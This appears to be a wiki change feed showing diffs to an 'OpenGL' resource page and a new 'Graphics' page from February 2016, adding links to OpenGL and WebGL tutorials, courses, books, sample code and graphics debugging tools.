* [http://learningwebgl.com/blog/?page_id=1217 Learning WebGL tutorials] ([https://github.com/gpjt/webgl-lessons source])([http://games.greggman.com/game/webgl-fundamentals/ WebGL Fundamentals (WebGL is a 2D API!)], [https://developer.mozilla.org/en/WebGL mozilla: WebGL])
Line 5: Line 9:
 
* [http://duriansoftware.com/joe/An-intro-to-modern-OpenGL.-Table-of-Contents.html An intro to modern OpenGL by Joe Groff] ([https://github.com/jckarter/hello-gl source])
 
* [http://duriansoftware.com/joe/An-intro-to-modern-OpenGL.-Table-of-Contents.html An intro to modern OpenGL by Joe Groff] ([https://github.com/jckarter/hello-gl source])
 
* [http://opengl.datenwolf.net/gltut/ Learning Modern 3D Graphics Programming by Jason L. McKesson] ([https://bitbucket.org/alfonse/gltut/overview source]) ([https://bitbucket.org/tartley/gltutpy python translation])
 
* [http://opengl.datenwolf.net/gltut/ Learning Modern 3D Graphics Programming by Jason L. McKesson] ([https://bitbucket.org/alfonse/gltut/overview source]) ([https://bitbucket.org/tartley/gltutpy python translation])
 +
* [http://www.tomdalling.com/blog/category/modern-opengl/ Tom Dalling's Modern OpenGL Series]
 +
* [http://www.codeproject.com/Articles/771225/Learning-Modern-OpenGL Learning Modern OpenGL]
 
* [http://en.wikibooks.org/wiki/OpenGL_Programming WikiBooks: OpenGL Programming]
 
* [http://en.wikibooks.org/wiki/OpenGL_Programming WikiBooks: OpenGL Programming]
 
* [http://pyopengl.sourceforge.net/context/tutorials/index.xhtml Python OpenGLContext Tutorials]
 
* [http://pyopengl.sourceforge.net/context/tutorials/index.xhtml Python OpenGLContext Tutorials]
* '''Performance''': [http://www.slideshare.net/CassEveritt/approaching-zero-driver-overhead Approaching zero driver overhead]
+
* '''Performance''': [http://www.slideshare.net/CassEveritt/approaching-zero-driver-overhead AZDO: Approaching zero driver overhead]
 +
 
 +
== Courses ==
 +
* [https://www.udacity.com/courses/cs291 Udacity CS291]
  
 
== WebGL ==
 
== WebGL ==
Line 15: Line 24:
 
* [http://benvanik.github.com/WebGL-Inspector/ WebGL Inspector]: step through WebGL calls or just draw calls, and view textures, buffers, shaders, and the current state – think gDEBugger for WebGL.
 
* [http://benvanik.github.com/WebGL-Inspector/ WebGL Inspector]: step through WebGL calls or just draw calls, and view textures, buffers, shaders, and the current state – think gDEBugger for WebGL.
 
* [http://analyticalgraphicsinc.github.com/webglreport/ WebGL Report]: shows a pipeline diagram of the system’s WebGL capabilities such as maximum texture size and number of texture image units.
 
* [http://analyticalgraphicsinc.github.com/webglreport/ WebGL Report]: shows a pipeline diagram of the system’s WebGL capabilities such as maximum texture size and number of texture image units.
* [http://webglstats.com/ WebGL Stats]
+
* Device support statistics: [http://webglstats.com/ WebGL Stats]
 +
* [http://webglworkshop.com/presentations/Workshop18-MakeGreat.html#/ Practical Learnings of WebGL for Make Benefit Glorious Internet of Web], Oct 2015
 +
* [https://github.com/unconed/mathbox Mathbox]: presentation-quality math diagrams and animations in WebGL
 +
* Presentation Editor: http://fhtr.org/editor/
 +
 
 +
 
 +
== Sample Code ==
 +
* [http://www.g-truc.net/project-0026.html OpenGL Samples Pack]: use FreeGLUT to create window and an OpenGL context, GLEW to load OpenGL implementations, GLM as math library and to replace OpenGL fixed pipeline functions and GLI to load images.
  
 
== Mobile / Embedded ==
 
== Mobile / Embedded ==
Line 29: Line 45:
 
* [http://code.google.com/p/angleproject ANGLE: "allow Windows users to seamlessly run WebGL content by translating OpenGL ES 2.0 API calls to DirectX 9 API calls"]: used by Google Chrome and WINE
 
* [http://code.google.com/p/angleproject ANGLE: "allow Windows users to seamlessly run WebGL content by translating OpenGL ES 2.0 API calls to DirectX 9 API calls"]: used by Google Chrome and WINE
  
== References ==
+
== Version Supprt ==
 +
* [https://developer.apple.com/opengl/capabilities/ Mac OSX OpenGL Capabilities]
 +
 
 +
== Books ==
 +
* [http://www.amazon.com/Real-Time-Rendering-Third-Tomas-Akenine-Mo-ller-ebook/dp/B007COYODQReal-Time Rendering, 3rd Edition] by Tomas Akenine-Mo¨ller
 +
* [http://www.amazon.com/gp/product/0321399528/ref=as_li_tl?ie=UTF8&camp=1789&creative=9325&creativeASIN=0321399528&linkCode=as2&tag=bfextcodeproj-20&linkId=LKAAHY6YZCRMH57I Computer Graphics: Principles and Practice 3rd Edition]
 
* red book: [http://www.opengl.org/documentation/red_book/ OpenGL Programming Guide]
 
* red book: [http://www.opengl.org/documentation/red_book/ OpenGL Programming Guide]
  
Line 36: Line 57:
  
 
== Tools ==
 
== Tools ==
 +
* [https://github.com/google/ion Google Ion]: analyze grpahics scenes, trace OpenGL calls, run-time graphics state introspection and shader editing
 +
* [https://github.com/ValveSoftware/vogl vogl]: OpenGL capture / playback debugger
 
* [https://github.com/apitrace/apitrace ApiTrace]: trace OpenGL, D3D9, D3D8, D3D7, and DDRAW APIs calls to a file
 
* [https://github.com/apitrace/apitrace ApiTrace]: trace OpenGL, D3D9, D3D8, D3D7, and DDRAW APIs calls to a file
 
** retrace OpenGL calls from a file
 
** retrace OpenGL calls from a file
Line 43: Line 66:
 
* [http://cgit.freedesktop.org/piglit/ Piglit OpenGL testsuite used by MESA] ([http://lists.freedesktop.org/mailman/listinfo/piglit mailing list])
 
* [http://cgit.freedesktop.org/piglit/ Piglit OpenGL testsuite used by MESA] ([http://lists.freedesktop.org/mailman/listinfo/piglit mailing list])
 
* [https://github.com/anholt/libepoxy libepoxy] OpenGL extension and window system function pointer management for Linux, Mac OS and Windows. Originally by Eric Anholt.
 
* [https://github.com/anholt/libepoxy libepoxy] OpenGL extension and window system function pointer management for Linux, Mac OS and Windows. Originally by Eric Anholt.
 +
* [http://synthclipse.sourceforge.net Sythclipse]: shader authoring environment
 +
 +
== See Also ==
 +
* [[Graphics]]

by Scott.tsai at February 22, 2016 04:57 AM

OpenGL

← Older revision Revision as of 04:03, 22 February 2016
Line 1: Line 1:
 
== Tutorials ==
 
== Tutorials ==
 +
* [http://pixelshaders.com/ Pixel Shaders] An Interactive Introduction to Graphics Programming by Toby Schachman
 +
* [http://webglfundamentals.org/ WebGL Fundamentals]
 +
* [http://learnopengl.com/ Learn OpenGL (learnopengl.com)]
 
* [http://notes.underscorediscovery.com/shaders-a-primer/ Primer : Shaders]
 
* [http://notes.underscorediscovery.com/shaders-a-primer/ Primer : Shaders]
 
* [http://learningwebgl.com/blog/?page_id=1217 Learning WebGL tutorials] ([https://github.com/gpjt/webgl-lessons source])([http://games.greggman.com/game/webgl-fundamentals/ WebGL Fundamentals (WebGL is a 2D API!)], [https://developer.mozilla.org/en/WebGL mozilla: WebGL])
 
* [http://learningwebgl.com/blog/?page_id=1217 Learning WebGL tutorials] ([https://github.com/gpjt/webgl-lessons source])([http://games.greggman.com/game/webgl-fundamentals/ WebGL Fundamentals (WebGL is a 2D API!)], [https://developer.mozilla.org/en/WebGL mozilla: WebGL])
Line 5: Line 8:
 
* [http://duriansoftware.com/joe/An-intro-to-modern-OpenGL.-Table-of-Contents.html An intro to modern OpenGL by Joe Groff] ([https://github.com/jckarter/hello-gl source])
 
* [http://duriansoftware.com/joe/An-intro-to-modern-OpenGL.-Table-of-Contents.html An intro to modern OpenGL by Joe Groff] ([https://github.com/jckarter/hello-gl source])
 
* [http://opengl.datenwolf.net/gltut/ Learning Modern 3D Graphics Programming by Jason L. McKesson] ([https://bitbucket.org/alfonse/gltut/overview source]) ([https://bitbucket.org/tartley/gltutpy python translation])
 
* [http://opengl.datenwolf.net/gltut/ Learning Modern 3D Graphics Programming by Jason L. McKesson] ([https://bitbucket.org/alfonse/gltut/overview source]) ([https://bitbucket.org/tartley/gltutpy python translation])
 +
* [http://www.codeproject.com/Articles/771225/Learning-Modern-OpenGL Learning Modern OpenGL]
 
* [http://en.wikibooks.org/wiki/OpenGL_Programming WikiBooks: OpenGL Programming]
 
* [http://en.wikibooks.org/wiki/OpenGL_Programming WikiBooks: OpenGL Programming]
 
* [http://pyopengl.sourceforge.net/context/tutorials/index.xhtml Python OpenGLContext Tutorials]
 
* [http://pyopengl.sourceforge.net/context/tutorials/index.xhtml Python OpenGLContext Tutorials]
* '''Performance''': [http://www.slideshare.net/CassEveritt/approaching-zero-driver-overhead Approaching zero driver overhead]
+
* '''Performance''': [http://www.slideshare.net/CassEveritt/approaching-zero-driver-overhead AZDO: Approaching zero driver overhead]
 +
 
 +
== Courses ==
 +
* [https://www.udacity.com/courses/cs291 Udacity CS291]
  
 
== WebGL ==
 
== WebGL ==
Line 15: Line 22:
 
* [http://benvanik.github.com/WebGL-Inspector/ WebGL Inspector]: step through WebGL calls or just draw calls, and view textures, buffers, shaders, and the current state – think gDEBugger for WebGL.
 
* [http://benvanik.github.com/WebGL-Inspector/ WebGL Inspector]: step through WebGL calls or just draw calls, and view textures, buffers, shaders, and the current state – think gDEBugger for WebGL.
 
* [http://analyticalgraphicsinc.github.com/webglreport/ WebGL Report]: shows a pipeline diagram of the system’s WebGL capabilities such as maximum texture size and number of texture image units.
 
* [http://analyticalgraphicsinc.github.com/webglreport/ WebGL Report]: shows a pipeline diagram of the system’s WebGL capabilities such as maximum texture size and number of texture image units.
* [http://webglstats.com/ WebGL Stats]
+
* Device support statistics: [http://webglstats.com/ WebGL Stats]
 +
* Presentation Editor: http://fhtr.org/editor/
 +
* [http://webglworkshop.com/presentations/Workshop18-MakeGreat.html#/ Practical Learnings of WebGL for Make Benefit Glorious Internet of Web], Oct 2015
  
 
== Mobile / Embedded ==
 
== Mobile / Embedded ==
Line 29: Line 38:
 
* [http://code.google.com/p/angleproject ANGLE: "allow Windows users to seamlessly run WebGL content by translating OpenGL ES 2.0 API calls to DirectX 9 API calls"]: used by Google Chrome and WINE
 
* [http://code.google.com/p/angleproject ANGLE: "allow Windows users to seamlessly run WebGL content by translating OpenGL ES 2.0 API calls to DirectX 9 API calls"]: used by Google Chrome and WINE
  
== References ==
+
== Version Supprt ==
 +
* [https://developer.apple.com/opengl/capabilities/ Mac OSX OpenGL Capabilities]
 +
 
 +
== Books ==
 +
* [http://www.amazon.com/Real-Time-Rendering-Third-Tomas-Akenine-Mo-ller-ebook/dp/B007COYODQReal-Time Rendering, 3rd Edition] by Tomas Akenine-Mo¨ller
 +
* [http://www.amazon.com/gp/product/0321399528/ref=as_li_tl?ie=UTF8&camp=1789&creative=9325&creativeASIN=0321399528&linkCode=as2&tag=bfextcodeproj-20&linkId=LKAAHY6YZCRMH57I Computer Graphics: Principles and Practice 3rd Edition]
 
* red book: [http://www.opengl.org/documentation/red_book/ OpenGL Programming Guide]
 
* red book: [http://www.opengl.org/documentation/red_book/ OpenGL Programming Guide]
  
Line 43: Line 57:
 
* [http://cgit.freedesktop.org/piglit/ Piglit OpenGL testsuite used by MESA] ([http://lists.freedesktop.org/mailman/listinfo/piglit mailing list])
 
* [http://cgit.freedesktop.org/piglit/ Piglit OpenGL testsuite used by MESA] ([http://lists.freedesktop.org/mailman/listinfo/piglit mailing list])
 
* [https://github.com/anholt/libepoxy libepoxy] OpenGL extension and window system function pointer management for Linux, Mac OS and Windows. Originally by Eric Anholt.
 
* [https://github.com/anholt/libepoxy libepoxy] OpenGL extension and window system function pointer management for Linux, Mac OS and Windows. Originally by Eric Anholt.
 +
 +
== See Also ==
 +
* [[Graphics]]

by Scott.tsai at February 22, 2016 04:03 AM

Graphics

Created page with "* [http://intothecontinuum.tumblr.com/ Into the Continuum]: Mathematica code and animations == See Also == * OpenGL"

New page

* [http://intothecontinuum.tumblr.com/ Into the Continuum]: Mathematica code and animations

== See Also ==
* [[OpenGL]]

by Scott.tsai at February 22, 2016 03:58 AM

OpenGL

← Older revision Revision as of 02:32, 22 February 2016
Line 4: Line 4:
 
* [http://blogoben.wordpress.com/webgl-basics/ WebGL Basics - The Blog-o-Ben]
 
* [http://blogoben.wordpress.com/webgl-basics/ WebGL Basics - The Blog-o-Ben]
 
* [http://duriansoftware.com/joe/An-intro-to-modern-OpenGL.-Table-of-Contents.html An intro to modern OpenGL by Joe Groff] ([https://github.com/jckarter/hello-gl source])
 
* [http://duriansoftware.com/joe/An-intro-to-modern-OpenGL.-Table-of-Contents.html An intro to modern OpenGL by Joe Groff] ([https://github.com/jckarter/hello-gl source])
* [http://www.arcsynthesis.org/gltut/ Learning Modern 3D Graphics Programming by Jason L. McKesson] ([https://bitbucket.org/alfonse/gltut/overview source]) ([https://bitbucket.org/tartley/gltutpy python translation])
+
* [http://opengl.datenwolf.net/gltut/ Learning Modern 3D Graphics Programming by Jason L. McKesson] ([https://bitbucket.org/alfonse/gltut/overview source]) ([https://bitbucket.org/tartley/gltutpy python translation])
 
* [http://en.wikibooks.org/wiki/OpenGL_Programming WikiBooks: OpenGL Programming]
 
* [http://en.wikibooks.org/wiki/OpenGL_Programming WikiBooks: OpenGL Programming]
 
* [http://pyopengl.sourceforge.net/context/tutorials/index.xhtml Python OpenGLContext Tutorials]
 
* [http://pyopengl.sourceforge.net/context/tutorials/index.xhtml Python OpenGLContext Tutorials]

by Scott.tsai at February 22, 2016 02:32 AM